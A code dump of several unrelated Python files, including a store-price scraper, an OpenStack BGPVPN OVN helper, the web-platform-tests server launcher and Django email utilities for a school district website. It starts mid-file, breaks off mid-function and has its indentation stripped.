if x.endswith(s):
return True
return False
def countblocks(path):
db = sqlite3.connect(path)
cursor = db.cursor()
cursor.execute("SELECT max(rnd) FROM blocks")
row = cursor.fetchone()
cursor.close()
db.close()
return row[0]
def tryhealthurl(healthurl, verbose=False, waitforround=100):
try:
response = urllib.request.urlopen(healthurl)
if response.code != 200:
return False
raw = response.read()
logger.debug('health %r', raw)
ob = json.loads(raw)
rt = ob.get('message')
if not rt:
return False
return int(rt) >= waitforround
except Exception as e:
if verbose:
logging.warning('GET %s %s', healthurl, e, exc_info=True)
return False
class subslurp:
# asynchronously accumulate stdout or stderr from a subprocess and hold it for debugging if something goes wrong
def __init__(self, f):
self.f = f
self.buf = io.BytesIO()
self.gz = gzip.open(self.buf, 'wb')
self.l = threading.Lock()
self.t = None
def run(self):
for line in self.f:
with self.l:
if self.gz is None:
return
self.gz.write(line)
def dump(self):
with self.l:
self.gz.close()
self.gz = None
self.buf.seek(0)
r = gzip.open(self.buf, 'rt')
return r.read()
def start(self):
self.t = threading.Thread(target=self.run)
self.t.daemon = True
self.t.start()
if __name__ == '__main__':
sys.exit(main())
|
store_watcher.py
|
from utilities import datetime, time_wrapper, file_handler, sleep
from yaml import safe_load, safe_dump
from termcolor import colored
from threading import Thread
from scraper import run
from time import time
from sys import argv
def print_usage():
print("Usage: \tpython3 store_watcher.py STATE CATEGORIES INTERVAL")
print("States: \tboth, new, used.")
print("Categories: \tall, gpu, cpu.")
print("Interval: \t[INT][TIME UNIT], amount of given time units. To run once, set interval to '0s'.")
print("Time units: \ts - second, m - minute, h - hour.\n")
print("Example usages:\n")
print("# Check stores for new GPUs every 6 hours.")
print("python3 store_watcher.py new gpu 6h\n")
print("# Check only once all stores selling both new and used parts for every supported category.")
print("python3 store_watcher.py both all 0s\n")
return None
def parse_args(args: [str]):
if len(args) < 4:
print("Invalid call! Missing arguments.\n")
print_usage()
return None
if args[1] not in ["both", "new", "used"]:
print("Invalid call! Unsupported bargain type.\n")
print_usage()
return None
if not all(map(lambda x: x in ["all", "gpu", "cpu"], args[2:-1])):
print("Invalid call! Unsupported hardware category.\n")
print_usage()
return None
if not all(map(lambda x: x in "0123456789smh", args[-1])):
print("Invalid call! Unsupported interval.\n")
print_usage()
return None
return args[1], args[2:-1], int(args[-1][:-1]) * {"s": 1, "m": 60, "h": 3600}.get(args[-1][-1], 1)
def scrape_store(store_dict: dict, store_name: str, catalog: dict, categories: dict, start_time: float) -> None:
timestamp = time_wrapper(time_format="%d-%m-%Y_%H-%M", return_type="time")
store_dict["last_update"] = timestamp
data = run(store_dict, catalog, categories, start_time)
end_time = round(time() - start_time, 3)
if data is None:
print(f"[ {colored('UPDATE FAILED', color='red')} ] {store_name}", end="")
return None
file_handler(f"cache/cache_{timestamp}_{store_name}.yaml", "w", content=data, wrapper=safe_dump)
print(f"[ {colored('UPDATED', color='green')} ] {store_name} in {end_time}s.")
return None
# Check if store is compliant with the criteria given by user
def check_store(store_dict: dict, store_name: str, requested_type: str) -> bool:
if not store_dict["allowed"] or (store_dict["store_type"] != requested_type and requested_type != "both"):
print(f"[ {colored('SKIPPED', color='yellow')} ] {store_name} - store filtered by criteria.")
return False
if "last_update" not in store_dict:
print(f"[ {colored('UPDATING', color='blue')} ] {store_name} - last update info not found.")
return True
last_update = datetime.strptime(store_dict["last_update"], "%d-%m-%Y_%H-%M")
current_time = datetime.strptime(datetime.today().strftime("%d-%m-%Y_%H-%M"), "%d-%m-%Y_%H-%M")
data_age = current_time.timestamp() - last_update.timestamp()
print(f"[ {colored('UPDATING', color='blue')} ] {store_name} - data is {round(data_age / 60, 0)} minutes old.")
return True
# Prepares a list of stores to scrape, then starts scraping them and stores results at the end
def scraper(store_type: str, categories: [str]) -> float:
start_time = time()
stores = file_handler(f"config/stores.yaml", "r", wrapper=safe_load)
catalog = file_handler(f"config/product_catalog.yaml", "r", wrapper=safe_load)
threads = []
for store in stores:
if check_store(stores[store], store, store_type):
threads.append(Thread(target=scrape_store, args=(stores[store], store, catalog, categories, start_time, )))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
file_handler("config/stores.yaml", "w", content=stores, wrapper=safe_dump)
return round(time() - start_time, 3)
def store_watcher():
parsed_argv = parse_args(argv)
if parsed_argv is None:
exit(1)
# One time parsing
if parsed_argv[2] == 0:
scraper(parsed_argv[0], parsed_argv[1])
return None
# Parsing on repeat
while True:
try:
watcher_start_time = time()
time_elapsed = scraper(parsed_argv[0], parsed_argv[1])
time_to_next_run = (watcher_start_time + parsed_argv[2]) - (watcher_start_time + time_elapsed)
if time_to_next_run < 0:
continue
print(f"Next scraping in {round(time_to_next_run / 60, 2)} minutes.")
sleep(time_to_next_run)
except KeyboardInterrupt:
if input("\nDo you wish to end the scraping [Y/n]? ") in "Yy":
exit(0)
print("Continuing in scraping.")
return None
if __name__ == '__main__':
store_watcher()
|
helper.py
|
# Copyright 2021 Red Hat, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import queue
import threading
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib.db import api as db_api
from neutron_lib import constants as n_lib_consts
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_log import log as logging
from ovs.stream import Stream
from networking_bgpvpn.neutron.services.service_drivers.ovn.common \
import config
from networking_bgpvpn.neutron.services.service_drivers.ovn.common \
import constants
from networking_bgpvpn.neutron.services.service_drivers.ovn.ovsdb \
import impl_idl_ovn
LOG = logging.getLogger(__name__)
class OvnProviderHelper():
def __init__(self):
self._requests = queue.Queue()
self._helper_thread = threading.Thread(target=self._request_handler)
self._helper_thread.daemon = True
self._check_and_set_ssl_files()
self._init_bgpvpn_actions()
self._subscribe()
self._helper_thread.start()
def _subscribe(self):
registry.subscribe(self._post_fork_initialize,
resources.PROCESS,
events.AFTER_INIT)
def _post_fork_initialize(self, resource, event, trigger, payload=None):
# We need to open a connection to OVN Northbound database for
# each worker so that we can process the BGPVPN requests.
self.ovn_nbdb = impl_idl_ovn.OvnNbIdlForBgpVpn()
self.ovn_nbdb_api = self.ovn_nbdb.start()
def _init_bgpvpn_actions(self):
self._bgpvpn_request_func_maps = {
constants.REQ_TYPE_CREATE_ROUTER_ASSOC: self.create_router_assoc,
constants.REQ_TYPE_DELETE_ROUTER_ASSOC: self.delete_router_assoc,
constants.REQ_TYPE_ADD_ROUTER_INTERFACE: self.add_router_interface,
}
def _check_and_set_ssl_files(self):
priv_key_file = config.get_ovn_nb_private_key()
cert_file = config.get_ovn_nb_certificate()
ca_cert_file = config.get_ovn_nb_ca_cert()
if priv_key_file:
Stream.ssl_set_private_key_file(priv_key_file)
if cert_file:
Stream.ssl_set_certificate_file(cert_file)
if ca_cert_file:
Stream.ssl_set_ca_cert_file(ca_cert_file)
def _request_handler(self):
while True:
request = self._requests.get()
request_type = request['type']
if request_type == constants.REQ_TYPE_EXIT:
break
request_handler = self._bgpvpn_request_func_maps.get(request_type)
try:
if request_handler:
request_handler(request['info'])
self._requests.task_done()
except Exception:
# If any unexpected exception happens we don't want the
# notify_loop to exit.
# TODO(cgoncalves): The resource(s) we were updating status for
# should be cleaned-up
LOG.exception('Unexpected exception in request_handler')
def _execute_commands(self, commands):
with self.ovn_nbdb_api.transaction(check_error=True) as txn:
for command in commands:
txn.add(command)
def shutdown(self):
self._requests.put({'type': constants.REQ_TYPE_EXIT})
self._helper_thread.join()
self.ovn_nbdb.stop()
del self.ovn_nbdb_api
def add_request(self, req):
self._requests.put(req)
def create_router_assoc(self, info):
LOG.debug('Creating router association in OVN Northbound database...')
context = info['context']
router_assoc = info['router_association']
bgpvpn = info['bgpvpn']
router_id = router_assoc['router_id']
external_ids = {
constants.OVN_EVPN_VNI_EXT_ID_KEY: str(bgpvpn.get('vni')),
constants.OVN_EVPN_AS_EXT_ID_KEY: str(cfg.CONF.ovn.bgp_as)}
filters = {'device_id': [router_id],
'device_owner': n_lib_consts.ROUTER_PORT_OWNERS}
with db_api.CONTEXT_READER.using(context):
router_ports = directory.get_plugin().get_ports(context, filters)
# Add VNI to router ports
port_ids = []
for iface in router_ports:
lsp = self.ovn_nbdb_api.lsp_get(
iface['id']).execute(check_error=True)
port_ids.append(lsp.uuid)
commands = []
for port_id in port_ids:
commands.append(
self.ovn_nbdb_api.db_set(
'Logical_Switch_Port', port_id,
('external_ids', external_ids)))
self._execute_commands(commands)
LOG.debug('Created router association in OVN Northbound database!')
def delete_router_assoc(self, info):
LOG.debug('Deleting router association in OVN Northbound database...')
context = info['context']
router_assoc = info['router_association']
router_id = router_assoc['router_id']
filters = {'device_id': [router_id],
'device_owner': n_lib_consts.ROUTER_PORT_OWNERS}
with db_api.CONTEXT_READER.using(context):
router_ports = directory.get_plugin().get_ports(context, filters)
# Remove VNI from router ports
port_ids = []
for iface in router_ports:
lsp = self.ovn_nbdb_api.lsp_get(
iface['id']).execute(check_error=True)
port_ids.append(lsp.uuid)
commands = []
for port_id in port_ids:
commands.append(
self.ovn_nbdb_api.db_remove(
'Logical_Switch_Port', port_id,
'external_ids', (constants.OVN_EVPN_VNI_EXT_ID_KEY)))
self._execute_commands(commands)
LOG.debug('Deleted router association in OVN Northbound database!')
def add_router_interface(self, info):
LOG.debug('Adding router interface in OVN Northbound database...')
port_id = info['port_id']
bgpvpn = info['bgpvpn']
external_ids = {
constants.OVN_EVPN_VNI_EXT_ID_KEY: str(bgpvpn.get('vni')),
constants.OVN_EVPN_AS_EXT_ID_KEY: str(cfg.CONF.ovn.bgp_as)}
lsp = self.ovn_nbdb_api.lsp_get(port_id).execute(check_error=True)
self.ovn_nbdb_api.db_set(
'Logical_Switch_Port', lsp.uuid,
('external_ids', external_ids)).execute(check_error=True)
LOG.debug('Added router interface in OVN Northbound database!')
def remove_router_interface(self, info):
LOG.debug('Removing router interface in OVN Northbound database...')
port_id = info['port_id']
lsp = self.ovn_nbdb_api.lsp_get(port_id).execute(check_error=True)
self.ovn_nbdb_api.db_remove(
'Logical_Switch_Port', lsp.uuid, 'external_ids',
(constants.OVN_EVPN_VNI_EXT_ID_KEY)).execute(check_error=True)
LOG.debug('Deleted router interface in OVN Northbound database!')
|
OPManager.py
|
import multiprocessing
from multiprocessing import Queue
from OpenPersonDetector import OpenPersonDetector
from newgen.GenerativeDetector import AbstractDetectorGenerator
class ManagedOPDetector:
def __init__(self, input_queue, output_queue):
self.input_queue = input_queue
self.output_queue = output_queue
def detectPersons(self, image, discardedGrayImage):
self.input_queue.put(image)
return self.output_queue.get()
class ManagedOPDetectorGenerator(AbstractDetectorGenerator):
def __init__(self, input_queue, output_queue):
super().__init__()
self.input_queue = input_queue
self.output_queue = output_queue
def generate_detector(self):
return ManagedOPDetector(self.input_queue, self.output_queue)
class ManagedOP:
def __init__(self):
self.queue_pairs = []
self.worker = None
def obtainGenerator(self):
input_queue = Queue()
output_queue = Queue()
self.queue_pairs.append((input_queue, output_queue))
return ManagedOPDetectorGenerator(input_queue, output_queue)
def _async_worker(self, queue_pairs):
person_detector = OpenPersonDetector(preview=False)
while True:
for input_queue, output_queue in queue_pairs:
if input_queue.qsize() > 0:
frame = input_queue.get()
person_detections = person_detector.detectPersons(frame, None)
output_queue.put(person_detections)
def startAsync(self):
self.worker = multiprocessing.Process(target=self._async_worker, args=(self.queue_pairs,))
self.worker.daemon = True
self.worker.start()
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import os
import re
import socket
import sys
import threading
import time
import traceback
import urllib2
import uuid
from collections import defaultdict, OrderedDict
from multiprocessing import Process, Event
from localpaths import repo_root
import sslutils
from manifest.sourcefile import read_script_metadata, js_meta_re
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port
from mod_pywebsocket import standalone as pywebsocket
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
path = self._get_path(request.url_parts.path, True)
meta = "\n".join(self._get_meta(request))
response.content = self.wrapper % {"meta": meta, "path": path}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on //META comments in the associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
class HtmlWrapperHandler(WrapperHandler):
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"script":
attribute = value.decode('utf-8').replace('"', """).replace(">", ">")
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
if key == b"timeout":
return None
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"))
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler),
("*", "/nodejs/*", handlers.WaveProxyHandler(config.ports["wave"][0]))]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/serve.py", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler(b"GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
b"%s%s" % (str(url_base) if url_base != "/" else "", str(suffix)),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
class ServerProc(object):
def __init__(self):
self.proc = None
self.daemon = None
self.stop = Event()
def start(self, init_func, host, port, paths, routes, bind_address, config,
ssl_config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config, ssl_config),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, ssl_config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config,
ssl_config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(domains, paths, bind_address, ssl_config, aliases):
domains = domains.copy()
host = domains.pop("")
port = get_port(host)
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases), bind_address,
None, ssl_config)
connected = False
for i in range(10):
try:
urllib2.urlopen("http://%s:%d/" % (host, port))
connected = True
break
except urllib2.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server on http://%s:%s. "
"You may need to edit /etc/hosts or similar, see README.md." % (host, port))
sys.exit(1)
for domain in domains.itervalues():
try:
urllib2.urlopen("http://%s:%d/" % (domain, port))
except Exception as e:
logger.critical("Failed probing domain %s. "
"You may need to edit /etc/hosts or similar, see README.md." % domain)
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config["domains"].values():
rv.append("%s\t%s\n" % (host, domain))
for not_domain in config.get("not_domains", {}).values():
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, ssl_config,
**kwargs):
servers = defaultdict(list)
for scheme, ports in ports.iteritems():
assert len(ports) == {"http":2}.get(scheme, 1)
for port in ports:
if port is None:
continue
if scheme == u'wave':
continue
init_func = {"http":start_http_server,
"https":start_https_server,
"ws":start_ws_server,
"wss":start_wss_server}[scheme]
server_proc = ServerProc()
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, ssl_config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=ssl_config["key_path"],
certificate=ssl_config["cert_path"],
encrypt_after_connect=ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, log_level, bind_address,
ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root,
"--log-level", log_level]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def start_ws_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_address,
ssl_config = None)
def start_wss_server(host, port, paths, routes, bind_address, config, ssl_config,
**kwargs):
return WebSocketDaemon(host,
str(port),
repo_root,
paths["ws_doc_root"],
"debug",
bind_address,
ssl_config)
def start(config, ssl_environment, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
ssl_config = config.ssl_config
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config,
ssl_config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def load_config(default_path, override_path=None, **kwargs):
if os.path.exists(default_path):
with open(default_path) as f:
base_obj = json.load(f)
else:
raise ValueError("Config path %s does not exist" % default_path)
rv = Config(**base_obj)
if os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent-origin"}
class Config(config.Config):
"""serve config
this subclasses wptserve.config.Config to add serve config options"""
def __init__(self, *args, **kwargs):
super(Config, self).__init__(
subdomains=_subdomains,
not_subdomains=_not_subdomains,
*args,
**kwargs
)
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
return parser
def run(**kwargs):
config = load_config(os.path.join(repo_root, "config.default.json"),
os.path.join(repo_root, "config.json"),
**kwargs)
global logger
logger = config.logger
set_logger(logger)
bind_address = config["bind_address"]
if config["check_subdomains"]:
paths = config.paths
ssl_config = config.ssl_config
check_subdomains(config.domains, paths, bind_address, ssl_config, config["aliases"])
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(config.server_host))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, config.ssl_env, build_routes(config["aliases"]), **kwargs)
try:
while any(item.is_alive() for item in iter_procs(servers)):
for item in iter_procs(servers):
item.join(1)
except KeyboardInterrupt:
logger.info("Shutting down")
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
functions.py
|
import os
import shutil
import re
import uuid
from urllib.parse import urlparse, urlsplit, urlunsplit
from django.conf import settings
from django.apps import apps
from django.db.models import Q
from django.core.mail import EmailMessage
from django.contrib.auth import get_permission_codename
from guardian.shortcuts import get_perms
from django.core.exceptions import FieldDoesNotExist
from django.utils import timezone
from datetime import timedelta
from ckeditor.fields import RichTextField
# Required for response change
import base64
from django.utils.translation import ugettext as _
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.http import HttpResponseRedirect
from django.utils.http import urlquote
from django.contrib import messages
from django.contrib.sites.models import Site
from multisite.models import Alias
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from pilkit.utils import suggest_extension
from threading import Thread
from collections import OrderedDict
def multisite_fallback_view(request):
pass
def contactmessage_confirm(self):
email = EmailMessage(
'THANK YOU: ' + self.message_subject,
('<p>We have received your message. '
'We will get back to you shortly.</p>'
'<br><p><strong>Original Message</strong>'
'</p><br><p>' + self.your_message + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
[self.your_email],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def contactmessage_message(self):
email = EmailMessage(
'WEBSITE CONTACT: ' + self.message_subject,
('<p><strong>From:</strong> {0}: {1}</p>'
'<p><strong>To:</strong> {2}</p><p><strong>Page:</strong> '
'<a href="https://{5}{3}">https://{5}'
'{3}</a></p><p><strong>Message:</strong><br>{4}</p>').format(
self.your_name,
self.your_email,
self.primary_contact.email,
self.parent.url,
self.your_message,
get_domain(self.site),
),
'"{0}" <{1}>'.format(self.your_name, self.your_email),
[self.primary_contact.email],
bcc=['webmaster@slcschools.org'],
reply_to=[self.your_email],
headers={
'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8],
'Sender': ('Salt Lake City School District'
'<webmaster@slcschools.org>'),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def customerror_emailadmins(subject, message):
email = EmailMessage(
subject,
message,
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={
'Message-ID': str(uuid.uuid4()),
},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def urlchanged_email(self, oldurl):
email = EmailMessage(
'Website URL Changed App {0} Type {1}'.format(
self.node_type, self.content_type),
('<p><strong>Previous URL:</strong> ' + oldurl + '</p>'
'<p><strong>New URL:</strong> ' + self.url + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def filepath_email(self, oldpath, newpath):
email = EmailMessage(
'File Path Changed: App {0} Type {1}'.format(
self.parent.node_type, self.parent.content_type),
('<p><strong>Previous Path:</strong> ' + oldpath + '</p>'
'<p><strong>New Path:</strong> ' + newpath + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def failed_saml_login_email(username):
email = EmailMessage(
'Failed SAML Login',
'An attempt to login via SAML has failed for username: {0}'.format(
username
),
'Salt Lake City School District <webmaster@slcschools.org>',
